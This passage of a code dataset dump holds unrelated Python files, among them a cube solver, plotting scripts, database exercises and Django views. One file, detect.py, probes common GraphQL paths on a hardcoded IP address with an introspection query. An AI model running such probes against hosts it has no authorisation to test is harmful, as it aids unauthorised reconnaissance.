[\"G\",\"Y\",\"O\"]:\n return True\n self.norm(3)\n self.norm(1)\n for j in range(2):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == [\"G\",\"Y\",\"O\"]:\n return True\n self.norm(1)\n self.norm(1)\n return False\n\n def equals(self, cube=None):\n if cube==None:\n cube = self\n checkCube:Cube = self.clone(state=self.solvedState)\n for j in range(4):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(3)\n checkCube.norm(1)\n for j in range(2):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(1)\n checkCube.norm(1)\n return False\n\n def clone(self,state=None):\n if state==None:\n state=self.currState\n \n clone = ''\n for i in range(0, len(state), 4):\n clone+=''.join(state[i:i+4]) + \" \"\n\n return Cube(clone)\n\n # apply a move to a state\n def applyMove(self, move):\n newState = []\n if move in MOVES:\n for colorIdx in MOVES[move]:\n newState.append(self.currState[colorIdx])\n\n self.currState = newState\n self.stateString = ''.join(self.currState)\n\n # apply a string sequence of moves to a state\n def applyMovesStr(self, alg:str):\n seq = alg.split()\n for i in seq:\n self.applyMove(i)\n \n\n def isSolved(self):\n if self.isSolvedQuick():\n return self.equals()\n return False\n \n def isSolvedQuick(self):\n lst = self.createStateList(self.currState)\n for i in lst:\n if len(set(i)) != 1:\n return False\n return True\n \n def shuffle(self, n):\n moveHistory = []\n for _ in range(n):\n randomNumber = random.randint(0, len(self.moves)-1)\n move = self.moves[randomNumber]\n self.applyMove(move)\n moveHistory.append(move)\n print(\"Shuffled Move Seq:\",' '.join(moveHistory))\n\n\n def printHelper(self,cubes):\n printHelperList=[]\n remainder = len(cubes)%3\n if remainder != 0:\n printHelperList.append([self.createStateList(cube) for cube in cubes[-remainder:]])\n cubes = cubes[:-remainder]\n for idx, lstIdx in enumerate(range(0,len(cubes),3)):\n addLst = [self.createStateList(cube) for cube in cubes[lstIdx:lstIdx+3]]\n printHelperList.insert(idx,addLst)\n return printHelperList \n\n def print(self,cubes = None):\n if cubes==None:\n listCubes = [[self.createStateList(self.currState)]]\n else:\n newLst = []\n listCubes = self.printHelper(cubes)\n print(end=\"\\n\")\n # print(\"-\"*13+\"-\"*14*(len(listCubes[0])-1)+\"|\")\n for idxLst, lst in enumerate(listCubes):\n length = len(lst)\n for idx in range(length):\n print(f\" {lst[idx][0][0]}{lst[idx][0][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][0][2]}{lst[idx][0][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][0]}{lst[idx][4][1]} {lst[idx][2][0]}{lst[idx][2][1]} {lst[idx][1][0]}{lst[idx][1][1]} {lst[idx][5][0]}{lst[idx][5][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][2]}{lst[idx][4][3]} {lst[idx][2][2]}{lst[idx][2][3]} {lst[idx][1][2]}{lst[idx][1][3]} {lst[idx][5][2]}{lst[idx][5][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][0]}{lst[idx][3][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][2]}{lst[idx][3][3]}\",end=\" \")\n print(end=\"\\n\\n\")\n # if length > 1:\n # for idx in range(length-1):\n # if idxLst is not len(listCubes)-1 and idx >= len(listCubes[idxLst+1]):\n # print(\"-\"*13,end=\"-\")\n # else:\n # 
print(\"-\"*13,end=\"+\")\n # print(\"-\"*13+\"|\")","repo_name":"satwikShresth/Rubiks_2x2x2_solver","sub_path":"Cube.py","file_name":"Cube.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1451850326","text":"import sys\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\nimport jieba\n\ndef fenci(filepath):\n f=open(filepath,\"r\")\n fn=open(\".\"+filepath,'a+')\n for line in f.readlines():\n seg_list = jieba.cut(line, cut_all=False)\n s= \"/ \".join(seg_list)\n fn.write(s)\n fn.close()\n f.close()\n print('end')\n\n\nclass FileEventHandler(FileSystemEventHandler):\n def __init__(self):\n FileSystemEventHandler.__init__(self)\n\n def on_moved(self, event):\n if event.is_directory:\n print(\"directory moved from {0} to {1}\".format(event.src_path,event.dest_path))\n else:\n print(\"file moved from {0} to {1}\".format(event.src_path,event.dest_path))\n\n def on_created(self, event):\n if event.is_directory:\n print(\"directory created:{0}\".format(event.src_path))\n else:\n fenci(event.src_path)\n print(\"file created:{0}\".format(event.src_path))\n\n def on_deleted(self, event):\n if event.is_directory:\n print(\"directory deleted:{0}\".format(event.src_path))\n else:\n print(\"file deleted:{0}\".format(event.src_path))\n\n def on_modified(self, event):\n if event.is_directory:\n print(\"directory modified:{0}\".format(event.src_path))\n else:\n print(\"file modified:{0}\".format(event.src_path))\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n path = '.'\n event_handler = FileEventHandler()\n observer = Observer()\n observer.schedule(event_handler, path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"SizzleWang/AscEndS","sub_path":"watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27470418028","text":"# Cezary Świtała\n# Kod użyty do generowania wykresów\n# pojawiających się w sprawozdaniu.\n\nfrom fisher import * # import własnych metod przydatnych przy wyliczaniu wartośći \n# funkcji gęstości rozkładu fishera\nimport math\nimport numpy\nimport matplotlib.pyplot as pyplot\n\ndef map_list(f, x): \n return list(map(f,x))\n\nx = numpy.linspace(0.001,4,num=200)\n\nfisher_1_1 = get_fisher_distr_density_function(1,1)\nfisher_2_1 = get_fisher_distr_density_function(2,1)\nfisher_4_1 = get_fisher_distr_density_function(4,1)\nfisher_4_2 = get_fisher_distr_density_function(4,2)\nfisher_4_4 = get_fisher_distr_density_function(4,4)\nfisher_6_4 = get_fisher_distr_density_function(6,4)\n\npyplot.plot(x, map_list(fisher_1_1, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1.5])\npyplot.legend()\npyplot.show()\npyplot.clf()\n\nfisher_1_1_cumulative = get_cumulative_fisher_distr(1,1,13);\nfisher_2_1_cumulative = 
get_cumulative_fisher_distr(2,1);\nfisher_4_1_cumulative = get_cumulative_fisher_distr(4,1);\nfisher_4_2_cumulative = get_cumulative_fisher_distr(4,2);\nfisher_4_4_cumulative = get_cumulative_fisher_distr(4,4);\nfisher_6_4_cumulative = get_cumulative_fisher_distr(6,4);\n\npyplot.plot(x, map_list(fisher_1_1_cumulative, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1_cumulative, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1_cumulative, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2_cumulative, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4_cumulative, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4_cumulative, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1])\npyplot.legend()\npyplot.show()","repo_name":"MusicFreak456/Uniwroc","sub_path":"SemestrIV/RPiS/Pracownia/1/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36889730166","text":"#!/usr/bin/env python3.7\n\nimport zoo_diversity_analysis\n\nimport re,glob,argparse\n\nparser = argparse.ArgumentParser(description=\"Process a shorah read file to filter and calculate the average number of polymorphic sites\\n\")\nessentialArgs = parser.add_argument_group('Files', 'Required arguments')\nessentialArgs.add_argument('-i','--input',metavar='input',required=True,type=str,dest='shorah_input',help=\"The reads.fas output file from ShoRAH\")\nessentialArgs.add_argument('-o','--output',metavar='output',required=True,type=str,dest='output_file',help=\"The file to print the results to\")\n#essentialArgs.add_argument('-r','--reference',metavar='reference',required=True,type=str,dest='reference_file',help=\"The file containing the reference sequence used in ShoRAH\")\nnonEssentialArgs = parser.add_argument_group('Conditions','Optional arguments')\n\nnonEssentialArgs.add_argument('-l','--pipeline-shorah',metavar='shorah',required=False,type=bool,dest='shorah',help=\"A boolean to indicate if the input is from the shorah pipeline, by default this is False.\")\nnonEssentialArgs.add_argument('-d','--directory',metavar='directory',required=False,type=bool,dest='input_is_directory',help=\"A boolean to indicate if the input is a directory or not, by default this is False.\")\nnonEssentialArgs.add_argument('-c','--continuous-mismatches',metavar='continuous',required=False,type=int,dest='contiguous_filter',help=\"The number of consecutive mismatches after which a particular read should be dropped.\")\nnonEssentialArgs.add_argument('-C','--minimum-predicted-coverage',metavar='coverage',required=False,type=float,dest='coverage',help=\"The average number of expected read coverages for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-p','--minimum-sequence-posterior-probability',metavar='min_prob',required=False,type=float,dest='min_prob',help=\"The required posterior probability for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-f','--identity-filter',metavar='identity',required=False,type=float,dest='identity',help=\"The required number of matches for a read to be included.\")\nnonEssentialArgs.add_argument('-M','--mega_output',metavar='MEGA',required=False,type=str,dest='MEGA',help=\"A prefix for outputing reads in short local alignments for subsequent analysis.\")\n# NOTE the following two arguments are dealt with 
here\nnonEssentialArgs.add_argument('-s','--input-files-suffix',metavar='input_suffix',required=False,type=str,dest='input_suffix',help=\"The suffix, or extension for the files that are to be used as input, by default .fas.\")\nnonEssentialArgs.add_argument('-O','--merge-output',metavar='merge_output',required=False,type=bool,dest='merge_output',help=\"A boolean to indicate whether the output should be merged or not, either True or False (default).\")\nnonEssentialArgs.add_argument('-w','--window-length',metavar='window_length',required=False,type=int,dest='window_length',help=\"The length of the windows to be used (by default 66).\")\nnonEssentialArgs.add_argument('-W','--wattersons-statistic',metavar='wattersons_statistic',required=False,type=bool,dest='wattersons_statistic',help=\"A boolean to indicate whether to use wattersons theta (True), or pi (if -W is not provided, default)\")\nnonEssentialArgs.add_argument('-N','--minimum-no-haplotypes',metavar='minimum_haplotypes',required=False,type=int,dest='minimum_haplotypes',help=\"The minimum required number of haplotypes for the diversity analysis to be performed (default 2)\")\n\narguments = parser.parse_args()\n\n# use the input_is_directory argument to either find the files, or to use the input argument directly\n\nif arguments.input_suffix is None:\n    arguments.input_suffix = \".fas\"\nif arguments.merge_output is None:\n    arguments.merge_output = False\nif arguments.input_is_directory is None:\n    arguments.input_is_directory = False\nif arguments.shorah is None:\n    arguments.shorah = False\nif arguments.wattersons_statistic is None:\n    arguments.wattersons_statistic = False\n\nif arguments.minimum_haplotypes is None:\n    arguments.minimum_haplotypes = 2\n\n\nif arguments.contiguous_filter is None:\n    arguments.contiguous_filter = 10\nif arguments.min_prob is None:\n    arguments.min_prob = 0.95\nif arguments.identity is None:\n    arguments.identity = 0.95\nif arguments.coverage is None:\n    arguments.coverage = 0\nif arguments.window_length is None:\n    arguments.window_length = 66\n\n\n\n\nif arguments.input_is_directory:\n    file_list = glob.glob(arguments.shorah_input + \"/*\" + arguments.input_suffix)\n    for aFile in file_list:\n        if arguments.merge_output:\n            output = open(arguments.output_file,\"a\")\n            zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n        else:\n            exp = re.compile(r\".*/(.*)\\.\\w+$\")\n            excludingExtension = re.match(exp,aFile)\n            theFile = excludingExtension.group(1) + arguments.output_file\n            output = open(theFile,\"w\")\n            zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\nelse:\n    output = open(arguments.output_file,\"a\")\n    
zoo_diversity_analysis.main(arguments.shorah_input,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n","repo_name":"Zoophobus/diversity","sub_path":"zoo_diversity.py","file_name":"zoo_diversity.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28192233802","text":"from sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.base_engine import Model, RecordTimestampFields\nimport sqlalchemy as sa\n\nfrom models.db_models import User\nfrom models.enums import CoinValueChangeEnum\n\n\nclass ActionsEconomy(Model, RecordTimestampFields):\n __tablename__ = \"actions_economy\"\n\n id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)\n action_name = sa.Column(sa.String, nullable=False)\n description = sa.Column(sa.Text)\n change_type: CoinValueChangeEnum = sa.Column(sa.String, nullable=False)\n change_amount = sa.Column(sa.Integer, nullable=False, server_default=\"0\")\n\n @classmethod\n async def execute(\n cls,\n session: AsyncSession,\n action_name: str,\n coin_receiver_user_id: int,\n ):\n\n action = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n ).where(ActionsEconomy.action_name == action_name)\n )\n ).fetchone()\n\n user_coins = (\n (\n await session.execute(\n sa.select(User.coins).where(User.id == coin_receiver_user_id)\n )\n )\n .fetchone()\n .coins\n )\n\n if action.change_type == \"EARN\":\n new_coin_value = user_coins + action.change_amount\n sign = \"\"\n else:\n new_coin_value = user_coins - action.change_amount\n sign = \"-\"\n if new_coin_value < 0:\n raise cls.InsufficientCoins(\"Not enough coins\")\n\n await session.execute(\n sa.update(User)\n .where(User.id == coin_receiver_user_id)\n .values({User.coins: new_coin_value})\n )\n\n return {\n \"change_amount\": f\"{sign}{action.change_amount}\",\n \"coins\": new_coin_value,\n }\n\n @staticmethod\n async def verify_possibility(\n session: AsyncSession,\n user_id: int,\n action_names: list\n | None = None, # if there is no action names - then check all\n ):\n actions = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n )\n )\n ).fetchall()\n user_wallet = (\n (await session.execute(sa.select(User.coins).where(User.id == user_id)))\n .fetchone()\n .coins\n )\n if not action_names:\n action_names = [action.action_name for action in actions]\n always_true = {\n action.action_name: True\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.EARN,\n ]\n )\n }\n possibilities = {\n action.action_name: (user_wallet - action.change_amount) > 0\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.SPEND,\n ]\n )\n }\n return {**always_true, **possibilities}\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"models/db_models/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26357661872","text":"#!/usr/bin/env python\nnum = int(input())\nheights = [0] + [int(x) for x in input().split()] + [0]\ncnt = 0\nup = heights[0] < 
heights[1]\nfor i in range(num + 1):\n if up and heights[i] > heights[i + 1]:\n cnt += 1\n up = False\n if not up and heights[i] < heights[i + 1]:\n # cnt += 1\n up = True\nprint(cnt)\n","repo_name":"aLagoG/kygerand","sub_path":"rpc/1/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"18443719686","text":"#!/usr/bin/python3\n\"\"\"This script adds the State object “Louisiana” to\nthe database hbtn_0e_6_usa\"\"\"\n\nimport sqlalchemy\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sys import argv\nfrom sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n \"\"\"to be accessed directly for MetaData-specific operations.\"\"\"\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n argv[1], argv[2], argv[3]), pool_pre_ping=True)\n\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_state = State(name='Louisiana')\n session.add(new_state)\n query = session.query(State).filter_by(name='Louisiana').first()\n print(new_state.id)\n session.commit()\n session.close()\n","repo_name":"EylenS/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2696228253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 11 14:54:55 2022\r\n\r\n@author: Sam\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\n#sediment flow parameters\r\nq0=0.22; a=1.1; \r\n#bed shape parameters\r\nb=0.2; k=2.0; eps=0.5; #bed porosity not given so I'll assume 0.5\r\n#space domain\r\nxdelta=0.1;\r\nstart=0.0; end=4.0;\r\nx=np.arange(start, end+xdelta,xdelta)\r\n#time domain\r\ntdelta=[0.05,0.1,0.15]\r\n#clear figures\r\nplt.cla(); plt.clf();\r\n#setup\r\nn=[];\r\nplt.style.use(\"dark_background\");\r\nfig, ax= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\n# initial conditions plot\r\nn.append(b*np.sin(k*x));\r\nax.plot(x,n[0],label=\"t=0\");\r\n# different time delta plots\r\nfor i in range(len(tdelta)):\r\n n.append( b*np.sin(k*x)-tdelta[i]*(a*b*k/eps)*np.cos(k*x) );\r\n ax.plot(x,n[i+1],label=\"$\\Delta t=$\"+str(tdelta[i]));\r\n# style of the plot\r\nax.set_xlabel(\"location (m)\");\r\nax.set_ylabel(\"bed elevation (m)\");\r\nax.legend();\r\nax.grid(True);\r\nplt.show();\r\n#now with a plot of the flow on top\r\nplt.style.use(\"default\");\r\nfig2, ax2= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\nax2.plot(x,n[0],label=\"$\\eta (x)$\",zorder=0);\r\ny_dummy=x*0;\r\nq=q0+a*n[0];\r\nax2.quiver(x,n[0],q,y_dummy,zorder=1);\r\n\r\n# style of the plot\r\nax2.set_xlabel(\"location (m)\");\r\nax2.set_ylabel(\"bed elevation (m)\");\r\nax2.set_title(\"flux $q_s$ on surface\");\r\nax2.legend();\r\nax2.grid(True);\r\nplt.show();","repo_name":"y05emite-sam/dep_mechanics","sub_path":"hw1/problem1.3.py","file_name":"problem1.3.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12633228072","text":"\"\"\"\nMedian of two sorted arrays\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.\n\nThe overall run time complexity should be O(log 
(m+n)).\n\n@Author: Venkat Rebba \n\"\"\"\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \n l1 = len(nums1)\n l2 = len(nums2)\n nums3 = []\n \n i, j, k = 0, 0, 0\n \n while True:\n \n if i>=l1 or j>=l2:\n break\n \n if nums1[i] >= nums2[j]:\n nums3.append(nums2[j])\n j += 1\n \n else:\n nums3.append(nums1[i])\n i += 1\n \n k += 1\n \n if l1-i > 0:\n nums3.extend(nums1[i:])\n \n if l2-j > 0:\n nums3.extend(nums2[j:])\n \n \n m = len(nums3)//2 \n med = nums3[m] if (len(nums3)%2 == 1) else (nums3[m-1] + nums3[m])/2\n return med\n \n \nn1 = [1,2,3]\nn2 = [2, 4, 5]\n\nsol = Solution()\nprint(sol.findMedianSortedArrays(n1, n2))\n ","repo_name":"venkatrebba/Leetcode_practice","sub_path":"meanOfTwoSortedArrays.py","file_name":"meanOfTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42511827564","text":"#!/usr/bin/python3\n\"\"\"\nMy Safe Filter States Module\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nargv = sys.argv\nif argv.__len__() == 5:\n ALX_DB_DETAIL = {\n 'host': \"localhost\",\n 'port': 3306,\n 'user': argv[1],\n 'passwd': argv[2],\n 'db': argv[3]\n }\n search_n = argv[4]\n db = MySQLdb.connect(**ALX_DB_DETAIL)\n cursor = db.cursor()\n query = \"\"\"SELECT cities.name\n FROM cities\n JOIN states ON cities.state_id = states.id\n WHERE states.name = %s\n ORDER BY cities.id ASC;\"\"\"\n cursor.execute(query, (search_n,))\n records = cursor.fetchall()\n my_list = [x[0] for x in records]\n print(\", \".join(my_list))\n \"\"\" record_count = cursor.rowcount\n for i in range(0, record_count):\n if i == record_count-1:\n print(cursor.fetchone()[0])\n else:\n print(cursor.fetchone()[0], end=', ')\"\"\"\n cursor.close()\n db.close()\n","repo_name":"NiiAdjei-001/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26398644087","text":"import json\r\nimport requests\r\nfrom urllib import parse\r\n\r\npaths = [\r\n \"\",\r\n \"/graphql\",\r\n \"/graphql/console\",\r\n \"graphql.php\",\r\n \"graphiql\",\r\n \"explorer\",\r\n \"altair\",\r\n \"/playground\"\r\n]\r\n\r\nquery = \"\"\"{\r\n __schema {\r\n types {\r\n name\r\n }\r\n }\r\n}\r\n\"\"\"\r\n\r\nfor path in paths:\r\n hostname = 'http://159.100.248.211'\r\n endpoint = parse.urljoin(hostname, path)\r\n try:\r\n print(f\"Attempt: {endpoint}\")\r\n response = requests.post(endpoint, json={'query': query}, timeout=0.1)\r\n except Exception:\r\n print(\"No GraphQL endpoint found\")\r\n else:\r\n if response.status_code == 200:\r\n json_data = json.loads(response.text)\r\n if json_data.get('data'):\r\n print(\"It is a GraphQL endpoint\",endpoint)\r\n","repo_name":"MarkDan101/graphdetect","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34501634182","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport rospy\nfrom beginner_tutorials.srv import *\n\ndef Celsius2Fahrenheit_client(x):\n rospy.wait_for_service('C2F')\n try:\n C2FF = rospy.ServiceProxy('C2F', Celsius2Fahrenheit)\n return C2FF(x)\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n\ndef usage():\n return \"%s [x]\"% 
sys.argv[0]\n\nif __name__ == \"__main__\":\n    if len(sys.argv) == 2:\n        x = float(sys.argv[1])\n        Celsius2Fahrenheit_client(x)\n    else:\n        print(usage())\n        sys.exit(1)\n    print(\"Requesting %s\"%(x))\n    var=x*1.8+32\n    print(str(x)+\" Celsius degrees is \" + str(var) + \" Fahrenheit degrees\")\n    \n","repo_name":"I1C/TemperatureConverterClientServer","sub_path":"scripts/Celsius2Fahrenheit_client.py","file_name":"Celsius2Fahrenheit_client.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33610794945","text":"from styles import *\r\nfrom ventanaViaje import *\r\nfrom ventanaEmpresa import *\r\nfrom ventanaChoferes import *\r\n\r\nclass VentanaPrincipal(QMainWindow):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.setWindowTitle(\"Remiseria\")\r\n        self.mainLayout = QVBoxLayout()\r\n        \r\n        self.titulo = Text(string=\"Bienvenido a Empresa de Jhoskin\", fontF=\"Cambria\", fontS=20)\r\n        self.mainLayout.addWidget(self.titulo)\r\n        \r\n        self.botonViaje = Button(string=\"Nuevo Viaje\", fontF=\"Cambria\", fontS=20)\r\n        self.mainLayout.addWidget(self.botonViaje)\r\n        self.botonViaje.clicked.connect(self.abrirVentanaViaje)\r\n        \r\n        self.botonEmpresa = Button(string=\"Empresa\", fontF=\"Cambria\", fontS=20)\r\n        self.mainLayout.addWidget(self.botonEmpresa)\r\n        self.botonEmpresa.clicked.connect(self.abrirVentanaEmpresa)\r\n        \r\n        self.botonChoferes = Button(string=\"Choferes\", fontF=\"Cambria\", fontS=20)\r\n        self.mainLayout.addWidget(self.botonChoferes)\r\n        self.botonChoferes.clicked.connect(self.abrirVentanaChoferes)\r\n\r\n        centralWidget = QWidget()\r\n        centralWidget.setLayout(self.mainLayout)\r\n        self.setCentralWidget(centralWidget)\r\n    \r\n    def abrirVentanaViaje(self):\r\n        self.windowViaje = WindowViaje()\r\n        self.windowViaje.show()\r\n\r\n    def abrirVentanaEmpresa(self):\r\n        self.windowEmpresa = WindowEmpresa()\r\n        self.windowEmpresa.show()\r\n    \r\n    def abrirVentanaChoferes(self):\r\n        self.windowChoferes = WindowChoferes()\r\n        self.windowChoferes.show()\r\n    \r\nif __name__ == '__main__':\r\n    app = QApplication()\r\n    window = VentanaPrincipal()\r\n    window.setStyleSheet(\"background-color: darkgray\")\r\n    window.show()\r\n    app.exec()","repo_name":"pablokan/side","sub_path":"efis/B/nine/proyecto/ventanaPrincipal.py","file_name":"ventanaPrincipal.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9263376454","text":"from __future__ import print_function\nimport time\nfrom schedule import Heap\nimport plugins\nfrom twisted.internet import reactor,protocol,endpoints,task\nfrom twisted.protocols.basic import LineReceiver\n\n__author__ = 'wstevens'\n\nclass IntercomProtocol(LineReceiver):\n\n    def check(self):\n        if not self.factory.heap.empty():\n            run_time, cmd = self.factory.heap.peek()\n            if run_time <= time.time():\n                self.factory.heap.pop()\n                cmd.act()\n\n    def connectionMade(self):\n        print(\"Connected successfully\")\n        c = task.LoopingCall(self.check)\n        c.start(5.0)\n\n    def lineReceived(self, line):\n        if line:\n            parts = line.decode('utf-8','ignore').split(\"|\")\n            if len(parts) >= 2:\n                parts[0]=' '.join(parts[:-1])\n                parts[1]=parts[-1]\n                print(parts[1],\"New Message Received: \",parts[0])\n                sc = plugins.command.SayCommand(parts[0])\n                self.factory.heap.push(float(parts[1]), sc)\n            \n\nclass IntercomClientFactory(protocol.ClientFactory):\n    protocol = IntercomProtocol\n    heap = Heap()\n\n    def 
clientConnectionFailed(self, connector, reason):\n print('connection failed:', reason.getErrorMessage())\n time.sleep(5)\n connector.disconnect()\n connector.connect()\n \n def clientConnectionLost(self, connector, reason):\n print('connection lost:', reason.getErrorMessage())\n connector.disconnect()\n connector.connect()\n\n def buildProtocol(self, addr):\n p = self.protocol()\n p.factory = self\n return p\n\ntry:\n with open('server.key.txt') as f:\n server = f.read().strip()\nexcept Exception:\n server = 'localhost'\n\nconnector = reactor.connectTCP(server, 42124, IntercomClientFactory())\nprint('connecting to:',server)\nreactor.run()\n\n","repo_name":"wasv/intercom","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"37128524240","text":"import json\nimport random\nfrom datetime import datetime, timedelta\n\nfrom django.db.models import Sum, Avg, Max\nfrom django.shortcuts import render\nfrom rest_framework.authtoken.models import Token\n\nfrom .models import UserData, Profile\n\n\ndef home_page(request):\n return render(request, 'Data/home_page.html', context={})\n\n\ndef ranking(request):\n # User token:\n # ----------------------------------------------------\n token = Token.objects.get(user=request.user) if request.user.is_authenticated else None\n\n # Best Contributors table:\n # ----------------------------------------------------\n\n # Get best first 25 contributors from db\n best_friends = Profile.objects.order_by('-score')[:25]\n\n # Format data to json for frontend\n bffs = [{'user': profile.user, 'score': profile.score, 'position': i + 1} for i, profile in enumerate(best_friends)]\n\n # Graph data:\n # ----------------------------------------------------\n\n # Creating list of days of this week\n days_this_week = []\n today = datetime.today().date()\n for i in range(8):\n date = (today + timedelta(days=-i))\n days_this_week.append(str(date))\n\n # Creating list of scores from this week\n score_this_week = []\n for i in range(8):\n score = sum([obj.score for obj in\n UserData.objects.filter(uploaded_at__date=datetime.today().date() - timedelta(days=i))])\n score_this_week.append(score)\n\n # Zipping scores and dates into one dict\n data = dict(zip(days_this_week, score_this_week))\n\n # Progress Bar data:\n # ----------------------------------------------------\n score_sum = Profile.objects.aggregate(Sum('score'))['score__sum']\n score_sum = score_sum if score_sum is not None else 0\n\n # Percent of individual help\n total_time_played = round(score_sum / 3600, 2)\n if request.user.is_authenticated and score_sum > 0:\n help_percent = round(100 * (Profile.objects.get(user=request.user).score) / score_sum, 1)\n else:\n help_percent = 0\n\n # Data Submitted:\n # ----------------------------------------------------\n if request.user.is_authenticated:\n uploads = 